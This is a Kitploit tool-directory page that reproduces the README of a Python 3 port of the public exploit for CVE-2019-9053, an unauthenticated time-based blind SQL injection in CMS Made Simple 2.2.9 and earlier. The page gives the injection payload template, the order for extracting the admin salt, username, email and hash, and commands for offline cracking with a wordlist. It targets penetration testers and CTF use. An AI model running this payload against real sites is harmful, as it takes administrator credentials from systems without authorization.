Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
cve-2019-9053-py3 — Unauthenticated time-based blind SQL injection exploit for CMS Made Simple ≤ 2.2.9 (CVE-2019-9053), ported to Python 3. | Kitploit
Tools/GitHubGitHub/vedantrana73/cve-2019-9053-py3
Password CrackingVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubvedantrana73/cve-2019-9053-py3

cve-2019-9053-py3

Unauthenticated time-based blind SQL injection exploit for CMS Made Simple ≤ 2.2.9 (CVE-2019-9053), ported to Python 3.

View Repository
163 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2019-9053 — CMS Made Simple SQLi Exploit (Python 3)

Python CVE Type Target License

Disclaimer: This tool is intended for authorized penetration testing and educational purposes only. Running this against systems without explicit written permission is illegal. The author assumes no liability for misuse.


Overview

This is a Python 3 port of the public exploit for CVE-2019-9053 — an unauthenticated time-based blind SQL injection vulnerability in CMS Made Simple ≤ 2.2.9.

The vulnerable parameter is m1_idlist on the /moduleinterface.php endpoint (News module). User input is passed unsanitised into a SQL query, allowing an unauthenticated attacker to extract the admin salt, username, email, and password hash — and optionally crack the password offline.

Original exploit by Daniele Scanu @ Certimeter Group.
Python 3 port with fixes and clean-up.


How It Works

The exploit uses a timing oracle — it injects SELECT sleep(T) into a SQL LIKE condition and measures the HTTP response time. If the server stalls ≥ T seconds, the injected condition was true. This allows data to be extracted one character at a time without any data ever appearing in the HTTP response body.

Payload structure:
  m1_idlist=a,b,1,5))+and+(select+sleep(1)+from+cms_users
            +where+password+like+0x{hex(known_prefix+guess)}25
            +and+user_id+like+0x31)+--+

Extraction order:

StepFieldTableNotes
1Saltcms_siteprefsRequired to crack the password
2Usernamecms_usersuser_id = 1 (admin)
3Emailcms_usersuser_id = 1 (admin)
4Passwordcms_usersStored as MD5(salt + password)

After extraction, optional offline dictionary attack computes MD5(salt + word) against a wordlist — no further network requests needed.


Python 3 Changes

The original script was written for Python 2. The following breaking changes were fixed:

#ChangeReason
1print "..." → print("...")print is a function in Python 3
2hashlib.md5(str(salt) + line) → hashlib.md5((salt + line).encode())hashlib.md5() requires bytes in Python 3
3dict = open(wordlist) → with open(wordlist) as wordlist_filedict shadows a built-in; switched to context manager
4print "\033c" → print("\033c", end="")Avoids double newline on terminal clear
5print colored(...) → print(colored(...))colored() returns a string; needs print() wrapper

Requirements

pip3 install requests termcolor
DependencyPurpose
requestsHTTP requests to the target
termcolorColoured terminal output

Usage

# Basic extraction (no password cracking)
python3 exploit.py -u http://<target-ip>/simple

# Extraction + offline password cracking
python3 exploit.py -u http://<target-ip>/simple --crack -w /usr/share/wordlists/rockyou.txt

Options

FlagDescription
-u, --urlBase URL of the CMS Made Simple installation
-w, --wordlistPath to a wordlist for offline password cracking
-c, --crackEnable password cracking mode

Example Output

[+] Salt for password found: 1234abcd
[+] Username found: admin
[+] Email found: [email protected]
[+] Password found: a1b2c3d4e5f6...
[+] Password cracked: password123

CVE Details

FieldValue
CVE IDCVE-2019-9053
CVSS Score7.5 (High)
TypeUnauthenticated Time-Based Blind SQL Injection
AffectedCMS Made Simple ≤ 2.2.9
Parameterm1_idlist in News module
Auth neededNone
PatchCMS Made Simple 2.2.10+

References

  • NVD — CVE-2019-9053
  • Original exploit — Exploit-DB #46635
  • CMS Made Simple

Legal

This exploit is provided for authorized penetration testing and CTF/educational use only.
Unauthorized use against systems you do not own or have explicit written permission to test is a criminal offence under the IT Act, 2000 (India) and equivalent laws worldwide.

Download Tool